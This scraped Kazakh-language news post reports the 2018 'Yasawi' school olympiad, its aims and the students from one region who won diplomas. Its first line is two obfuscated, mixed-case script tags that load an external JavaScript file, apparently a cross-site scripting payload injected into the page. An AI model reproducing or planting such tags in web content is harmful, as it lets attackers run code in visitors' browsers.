<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.04.2018

2018 жылдың 13-14 сәуір айында Қазақстан Республикасы Білім және ғылым министрлігінің «Дарын» Республикалық ғылыми-практикалық орталығының жоспары бойынша Қожа Ахмет Ясауи атындағы Халықаралық қазақ-түрік униветситеті 11 сынып оқушылары арасында  V Республикалық «Ясауи» пәндік олимпиадасының қорытынды кезеңі өтті. Олимпиада физика, математика, биология,химия, информатика, география, қазақ тілі, орыс тілі, ағылшын тілі, қазақстан тарихы, жалпы тарих пәндері бойынша өткізілді.

Олимпиаданың негізгі міндеттері:

-  Оқушылардың физика, математика, биология, химия, информатика, география, қазақ тілі, орыс тілі, ағылшын тілі, қазақстан тарихы, жалпы тарих пәндерін тереңдетіп оқытуға деген қызығушылығын арттыру;

-  Оқушылардың қызығушылықтары мен қабілеттерін жан-жақты дамыту;

-  Оқушыларға білімнің кез-келген саласындағы жаңа жетістіктермен таныстыру:

-Оқу және кәсіби мотивация деңгейін арттыру.

Олимпиадаға облыстың Ерейментау, Зеренді, Целиноград, Шортанды аудандарынан, Астана қаласы, дарынды балаларға арналған № 2 облыстық

мамандандырылған мектеп-интернаты, Көкшетау қаласы, (қазақ тілінде оқытылатын)дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатынан барлығы 33 оқушы қатысты.

Олимпиаданың қорытындысы бойынша біздің облыстан 5 оқушы II, ІІІ дәрежелі дипломмен марапатталып, грантқа ие болды.

II дәрежелі дипломмен 3 оқушы марапатталды:

1.  Жанарбек Салауат – «Информатика» пәні бойынша Шортанды ауданы№3 қазақ орта мектебінің 11-сынып оқушысы;

2.  Орал Нұрсылтан – «Тарих» пәні бойынша Зеренді ауданы, Ортақ орта мектебінің 11 сынып оқушысы;

3. Хозышыбай Гулжаухар – «Биология» Целиноград ауданы, Қоянды орта мектебінің 11 сынып оқушысы;

IIІ дәрежелі дипломмен 2 оқушы марапатталды:

1.Зейнелқабден Ұлан – «Қазақ тілі» пәні бойынша Зеренді ауданы, Шағалалы орта мектебінің 11-сынып оқушысы;

2.   Қабдолла Іңкәр - «География» пәні бойынша Зеренді ауданы, Шағалалы орта мектебінің 11-сынып оқушысы;

Олимпиаданың қатысушыларына сертификат және Қожа Ахмет Ясауи атындағы Халықаралық қазақ-түрік униветситетіне түсу кезінде 25 % жеңілдік берілді.

Просмотров: 623


Пікір қосу



Деректерді қолтаңбаға қосу